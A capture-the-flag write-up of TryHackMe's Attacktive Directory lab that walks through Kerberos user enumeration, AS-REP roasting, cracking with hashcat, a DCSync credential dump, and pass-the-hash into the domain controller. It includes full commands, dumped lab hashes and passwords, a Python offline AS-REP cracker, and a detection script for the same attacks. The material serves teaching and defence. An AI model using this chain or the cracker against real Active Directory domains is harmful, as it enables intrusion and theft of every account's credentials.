Hi everyone! Today's post is on the TryHackMe challenge Attacktive Directory, which introduces you to Kerberos user enumeration with Kerbrute against a Domain Controller (DC), AS-REP Roasting with Impacket's GetNPUsers, cracking the resulting Kerberos hash with Hashcat, dumping password hashes from the DC, and using Evil-WinRM to get a shell on it. Let's get started!

1. Deploy the machine

You can use Kali Linux, Parrot OS, or TryHackMe (THM)'s attack machine to attack the Domain Controller (DC).

2. Setup

Impacket installation

Impacket is notoriously easy to install incorrectly, and a missed step usually shows up later as a pile of import errors when you run its example scripts. TryHackMe (THM) therefore provides the installation steps. If you are using THM's attack machine, Impacket and BloodHound are already installed.

Firstly, we have to clone Impacket from the GitHub repository.

kali@kali~$ sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

Next, we shall install the requirements.

kali@kali~$ sudo pip3 install -r /opt/impacket/requirements.txt

Finally, we can run the Python installation script.

kali@kali~$ cd /opt/impacket/ && sudo python3 ./setup.py install

3. Welcome to Active Directory

We first use nmap to see which services the Domain Controller (DC) exposes. In this lab there is only the DC. In a real Active Directory (AD) environment we would often have to enumerate and compromise other workstations or servers before getting a shot at the DC.

kali@kali~$ sudo nmap -sC -sV -n -p- 10.10.6.165
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-11 22:05 EST
Nmap scan report for 10.10.139.4
Host is up (0.36s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-12 07:17:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| DNS_Tree_Name: spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-01-12T07:18:14+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-01-11T06:34:36
|_Not valid after: 2022-07-13T06:34:36
|_ssl-date: 2022-01-12T07:18:26+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

We can also run enum4linux against ports 139/445 to pull information over SMB/NetBIOS: known usernames, the NetBIOS domain name, the domain SID and so on. Note the session check in the output below: the DC accepts a null session (empty username and password), which is what lets an unauthenticated client read the domain SID.

kali@kali~$ enum4linux 10.10.6.165
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jan 11 22:10:14 2022

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.6.165
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ===================================================
|    Enumerating Workgroup/Domain on 10.10.6.165   |
 ===================================================
[E] Can't find workgroup/domain

 ===========================================
|    Nbtstat Information for 10.10.6.165    |
 ===========================================
Looking up status of 10.10.6.165
No reply from 10.10.6.165

 ====================================
|    Session Check on 10.10.6.165    |
 ====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.139.4 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

 ==========================================
|    Getting domain SID for 10.10.6.165    |
 ==========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
...

Questions and answers

What tool will allow us to enumerate port 139/445?

enum4linux

What is the NetBIOS-Domain Name of the machine?

THM-AD

What invalid TLD do people commonly use for their Active Directory Domain?

.local

4. Enumerating Users via Kerberos

TryHackMe (THM) recommends Kerbrute for this task. Kerbrute speaks directly to Kerberos, the authentication service every Active Directory Domain Controller exposes on port 88, and can enumerate usernames as well as guess passwords; THM supplies a trimmed username list and password list for the room. Keep the two uses apart. The userenum command sends AS-REQs with no pre-authentication data, so the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for names that do not exist and KDC_ERR_PREAUTH_REQUIRED for names that do. No password is ever submitted, so it cannot lock anyone out, although a DC that audits the Kerberos Authentication Service logs a 4768 failure with result code 0x6 for each unknown name. Password guessing with bruteuser or passwordspray does submit credentials and will trip account lockout policies, so it is not recommended on a real domain without checking the policy first.

First, I downloaded Kerbrute onto my Kali box and made it executable.

kali@kali~$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
kali@kali~$ chmod +x kerbrute_linux_amd64

Next, I downloaded both the user list and password list.

kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

We can now check out the usage of the tool and use it on the Domain Controller (DC).

kali@kali~$ ./kerbrute_linux_amd64 --help
...
Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int       Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

kali@kali~$ ./kerbrute_linux_amd64 userenum --dc=10.10.6.165 -d=spookysec.local. userlist.txt
...
Version: v1.0.3 (9dad6e1) - 01/11/22 - Ronnie Flathers @ropnop

2022/01/11 22:53:06 >  Using KDC(s):
2022/01/11 22:53:06 >   10.10.6.165:88

2022/01/11 22:53:07 >  [+] VALID USERNAME:       james@spookysec.local.
2022/01/11 22:53:13 >  [+] VALID USERNAME:       svc-admin@spookysec.local.
2022/01/11 22:53:21 >  [+] VALID USERNAME:       James@spookysec.local.
2022/01/11 22:53:24 >  [+] VALID USERNAME:       robin@spookysec.local.
2022/01/11 22:53:54 >  [+] VALID USERNAME:       darkstar@spookysec.local.
2022/01/11 22:54:13 >  [+] VALID USERNAME:       administrator@spookysec.local.
2022/01/11 22:54:50 >  [+] VALID USERNAME:       backup@spookysec.local.
2022/01/11 22:55:08 >  [+] VALID USERNAME:       paradox@spookysec.local.

Questions and answers

What command within Kerbrute will allow us to enumerate valid usernames?

userenum

What notable account is discovered? (These should jump out at you)

svc-admin

What other notable account is discovered? (These should jump out at you)

backup

5. Abusing Kerberos

This box is vulnerable to AS-REP Roasting: at least one account has "Do not require Kerberos preauthentication" set (the UF_DONT_REQUIRE_PREAUTH flag in userAccountControl). Normally a client must prove knowledge of the password, by sending an encrypted timestamp, before the KDC issues a ticket; for an account with that flag the KDC sends the AS-REP to anyone who asks, and the reply's encrypted part is keyed with the account's password hash, so it can be cracked offline. Impacket's /opt/impacket/examples/GetNPUsers.py asks the Key Distribution Center for such accounts, but it needs a list of usernames to try, and the valid names Kerbrute found earlier are exactly that list.

In my validusers.txt:

james
svc-admin
James
robin
darkstar
administrator
backup
paradox

Querying for AS-REP roastable accounts:

kali@kali~$ python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip 10.10.6.165 spookysec.local/
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set

Only svc-admin came back with a ticket; for every other account the KDC enforced pre-authentication and refused. The $krb5asrep$23$ line is the AS-REP's encrypted part, encrypted under a key derived from svc-admin's password, and that is what we crack next.

Looking the $krb5asrep$23$ prefix up in hashcat's example hashes gives mode 18200 (Kerberos 5, etype 23, AS-REP). The 23 is the encryption type, RC4-HMAC, whose key is just the unsalted NT hash of the password; that is what makes this cheap to crack.

kali@kali~$ hashcat -h | grep 18200
  18200 | Kerberos 5, etype 23, AS-REP                     | Network Protocols

Finally, we can attempt to crack the password of svc-admin using hashcat. I first store the hash in hash.txt before cracking it with the password list provided previously.

kali@kali~$ cat hash.txt
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566

kali@kali~$ hashcat -m18200 hash.txt passwordlist.txt
...
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566:management2005

Against the small supplied list this takes only seconds in a Kali VM; on a host with a GPU it is faster still. The password comes back as "management2005".
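To see what hashcat mode 18200 actually checks for each candidate, here is an added example in Python; it is my code, not part of the room, Impacket or hashcat. It reimplements RC4-HMAC (etype 23, RFC 4757) on top of a pure-Python MD4, parses the $krb5asrep$23$ line GetNPUsers printed, and tests candidate passwords against it exactly as the cracker does. The file and function names, and the build_sample_hash helper that fabricates a dummy enc-part for testing, are my own; the key usage number 8 is the RC4-HMAC quirk that hashcat relies on (RC4-HMAC maps RFC 4120's usage 3 for the AS-REP enc-part to 8).

```python
import hashlib
import hmac
import os
import struct

# RC4-HMAC maps RFC 4120 key usage 3 (AS-REP enc-part) to 8; hashcat 18200 uses 8 and so do we.
AS_REP_KEY_USAGE = 8
MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python: OpenSSL 3 ships MD4 only in its legacy provider."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    rounds = (  # (round function, additive constant, shift table, message-word order)
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation, XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))  # the RC4-HMAC key is the NT hash: unsalted MD4 of UTF-16LE

def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def rc4_hmac_encrypt(key, usage, plaintext, confounder=None):
    """RFC 4757 encrypt -> (checksum, edata), the two fields GetNPUsers prints as checksum$edata."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = (confounder or os.urandom(8)) + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum, rc4(_hmac_md5(k1, checksum), data)

def rc4_hmac_decrypt(key, usage, checksum, edata):
    """RFC 4757 decrypt; None means this key (i.e. this password guess) is wrong."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    plain = rc4(_hmac_md5(k1, checksum), edata)  # 8-byte confounder || EncASRepPart DER
    # Cheap early reject, as hashcat does: the DER opens with APPLICATION tag 0x79 (or 0x7a from some KDCs)
    if len(plain) < 9 or plain[8] not in (0x79, 0x7A):
        return None
    if not hmac.compare_digest(_hmac_md5(k1, plain), checksum):
        return None
    return plain[8:]

def parse_asrep_hash(line: str):
    """'$krb5asrep$23$user@REALM:<checksum hex>$<edata hex>' -> (principal, checksum, edata)."""
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("only etype 23 (RC4-HMAC) AS-REP hashes are handled here")
    principal, rest = line[len(prefix):].strip().split(":", 1)
    checksum_hex, edata_hex = rest.split("$", 1)
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)

def crack_asrep(line: str, wordlist):
    """Offline dictionary attack: no traffic to the KDC, nothing for a lockout policy to count."""
    _, checksum, edata = parse_asrep_hash(line)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), AS_REP_KEY_USAGE, checksum, edata) is not None:
            return candidate
    return None

def build_sample_hash(user: str, realm: str, password: str) -> str:
    """Constructed stand-in for a KDC reply (dummy enc-part with only the outer DER tag right)."""
    dummy_enc_as_rep_part = b"\x79\x81\x20" + b"\x00" * 32
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), AS_REP_KEY_USAGE, dummy_enc_as_rep_part)
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${edata.hex()}"

if __name__ == "__main__":  # usage: python3 asrep_check.py hash.txt passwordlist.txt
    import sys
    words = open(sys.argv[2], encoding="utf-8", errors="ignore").read().splitlines()
    for line in open(sys.argv[1]).read().split():
        print(parse_asrep_hash(line)[0], "->", crack_asrep(line, words))
```

Run it as python3 asrep_check.py hash.txt passwordlist.txt (file names assumed) to reproduce the result above. The design point is in crack_asrep: each guess costs one MD4, three HMAC-MD5s and one RC4 pass, and none of it touches the KDC. That is why a weak password on a no-preauth account turns into credentials for an unauthenticated attacker rather than a lockout-limited online brute force, and why hashcat's early reject on the DER tag matters: it skips the full HMAC for almost every wrong guess.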

Questions and answers

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

svc-admin

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

Kerberos 5, etype 23, AS-REP

What mode is the hash?

18200

Now crack the hash with the modified password list provided, what is the user accounts password?

management2005

6. Back to the Basics

We can now attempt to enumerate SMB shared folders using our newly found credentials.

kali@kali~$ smbclient -L 10.10.6.165 -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share

Going through the shares, backup is the one that matters: svc-admin can connect to it, and it contains a single text file.

kali@kali~$ smbclient \\\\10.10.6.165\\backup -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

I downloaded the text file and looked at its content.

smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit

kali@kali~$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

The content looks like base64. Decoding it yields a username and password pair.

kali@kali~$ base64 -d backup_credentials.txt
backup@spookysec.local:backup2517860

Questions and answers

What utility can we use to map remote SMB shares?

smbclient

Which option will list shares?

-L

How many remote shares is the server listing?

6

There is one particular share that we have access to that contains a text file. Which share is it?

backup

What is the content of the file?

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decoding the contents of the file, what is the full contents?

backup@spookysec.local:backup2517860

7. Elevating Privileges within the Domain

The backup credentials take us much further than svc-admin's did. The room describes backup as the DC's backup service account, to which every change in Active Directory (AD) is synchronised; in AD terms that means the account holds the directory replication rights (Replicating Directory Changes and Replicating Directory Changes All) that are normally granted only to domain controllers. Anyone holding those rights can ask the DC to replicate its secrets, including every user's password hash. This is the DCSync technique, and Impacket's secretsdump.py implements it as its DRSUAPI method. Note the first line of the output below: the RemoteOperations step (remote registry and SAM access) fails with access denied because backup is not a local administrator on the DC, but the replication-based dump still succeeds.

kali@kali~$ python3 /opt/impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@10.10.6.165
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4: ::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:bf23f4f1cf41c6f75b54f6acb6c90226:::
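For the blue-team side of two steps on this page, the Kerbrute user enumeration in section 4 and the DCSync-style dump above, here is an added example of detection logic run over constructed Security-log events; it is my code, not something the room provides. It assumes events exported as one "timestamp key=value ..." line each (field names mirror the EventData of 4768 and 4662), a 4768 failure with Status 0x6 logged for every unknown principal Kerbrute probed (needs the "Audit Kerberos Authentication Service" policy on the DC), and a 4662 carrying the replication control-access GUIDs for each DCSync request (needs "Audit Directory Service Access" plus a SACL on the domain object). The sample log, the thresholds and the ATTACKTIVEDIREC$ allowlist are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Control-access right GUIDs a DCSync (DRSUAPI replication) request needs on the domain object.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample: Security-log events flattened to one 'timestamp key=value ...' line each.
# Field names follow the EventData of 4768/4662; the values are made up for this example.
SAMPLE_LOG = [
    f"2022-01-11T22:53:{i:02d}Z EventID=4768 TargetUserName={name} TargetDomainName=spookysec.local "
    f"IpAddress=::ffff:10.10.50.22 Status=0x6"
    for i, name in enumerate(["jmes", "bob", "alice", "ftp", "www", "mail", "test", "guest2", "sql", "dev", "ops"])
] + [
    "2022-01-11T22:53:12Z EventID=4768 TargetUserName=james TargetDomainName=spookysec.local IpAddress=::ffff:10.10.50.22 Status=0x0",
    "2022-01-11T22:53:12Z EventID=4768 TargetUserName=jon TargetDomainName=spookysec.local IpAddress=::ffff:10.10.60.7 Status=0x6",
    "2022-01-11T23:40:02Z EventID=4662 SubjectUserName=backup SubjectDomainName=THM-AD AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "2022-01-11T23:40:02Z EventID=4662 SubjectUserName=ATTACKTIVEDIREC$ SubjectDomainName=THM-AD AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",
    "2022-01-11T23:41:00Z EventID=4662 SubjectUserName=james SubjectDomainName=THM-AD AccessMask=0x10 Properties={bf967a7f-0de6-11d0-a285-00aa003049e2}",
]

def parse_event(line: str) -> dict:
    """One flattened event line -> dict keyed by the EventData field names, plus a parsed time."""
    stamp, _, rest = line.partition(" ")
    event = {"time": datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")}
    event.update(re.findall(r"(\w+)=(\S+)", rest))
    return event

def detect_user_enumeration(events, window=timedelta(minutes=5), threshold=10):
    """Kerbrute userenum leaves one 4768 failure with Status 0x6 (principal unknown) per guessed
    name, all from one client address. Flag a source with many distinct names in a short window;
    returns {client address: highest distinct-name count seen in any window}."""
    by_source = defaultdict(list)
    for ev in events:
        if ev.get("EventID") == "4768" and ev.get("Status", "").lower() == "0x6":
            by_source[ev["IpAddress"]].append((ev["time"], ev["TargetUserName"]))
    hits = {}
    for source, attempts in by_source.items():
        attempts.sort()
        start = 0
        for end, (t_end, _) in enumerate(attempts):
            while t_end - attempts[start][0] > window:  # slide the window's left edge forward
                start += 1
            distinct = {name for _, name in attempts[start:end + 1]}
            if len(distinct) >= threshold:
                hits[source] = max(hits.get(source, 0), len(distinct))
    return hits

def detect_dcsync(events, domain_controllers):
    """A 4662 whose Properties carry a replication right, requested by anything other than a DC
    computer account, is a DCSync. domain_controllers is the set of DC SAM names (e.g.
    {'ATTACKTIVEDIREC$'}); keep it in sync with AD rather than trusting a '$' suffix, since
    DC-to-DC replication legitimately produces the same event from DC accounts."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != "4662":
            continue
        guids = set(re.findall(r"[0-9a-f-]{36}", ev.get("Properties", "").lower()))
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())
        subject = ev.get("SubjectUserName", "")
        if rights and subject not in domain_controllers:
            alerts.append((subject, rights))
    return alerts

if __name__ == "__main__":
    events = [parse_event(line) for line in SAMPLE_LOG]
    print("user enumeration sources:", detect_user_enumeration(events))
    print("dcsync alerts:", detect_dcsync(events, domain_controllers={"ATTACKTIVEDIREC$"}))
```

Two caveats a practitioner would want. The valid names Kerbrute confirms produce KDC_ERR_PREAUTH_REQUIRED, which Windows does not log as a failure, so the enumeration rule keys on the noise of the misses, not the hits; a short, targeted list of real names slips under it, which is why the distinct-name threshold should be tuned against your own baseline rather than copied. The DCSync rule depends entirely on the allowlist being the real set of DC computer accounts: the example's ATTACKTIVEDIREC$ is the DC from this room, and an attacker who takes over a DC account will look like replication.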

Finally, since port 5985 (WinRM over HTTP) is open on the DC, we install Evil-WinRM to get a shell.

kali@kali~$ sudo gem install evil-winrm

Questions and answers

What method allowed us to dump NTDS.DIT?

DRSUAPI

What is the Administrator's NTLM hash?

0e0363213e37b94221497260b0bcb4fc

What method of attack could allow us to authenticate as the user without the password?

pass the hash

Using a tool called Evil-WinRM what option will allow us to use a hash?

-H

8. Flag submission panel

Submit the flag for each user account; they sit on each user's desktop. Rather than logging in three times, we can log in once as Administrator with the NTLM hash from secretsdump (pass-the-hash over WinRM, Evil-WinRM's -H option), since Administrator can read every other user's desktop.

kali@kali~$ evil-winrm -i 10.10.6.165 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
...
*Evil-WinRM* PS C:\Users\Administrator\Documents>

We can now go to each user's desktop and read the flag.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\svc-admin\Desktop
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> dir

    Directory: C:\Users\svc-admin\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:18 PM             28 user.txt.txt

*Evil-WinRM* PS C:\Users\svc-admin\Desktop> type user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}

*Evil-WinRM* PS C:\Users\svc-admin\Desktop> cd C:\Users\backup\Desktop
*Evil-WinRM* PS C:\Users\backup\Desktop> dir

    Directory: C:\Users\backup\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:19 PM             26 PrivEsc.txt

*Evil-WinRM* PS C:\Users\backup\Desktop> type PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}

*Evil-WinRM* PS C:\Users\backup\Desktop> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
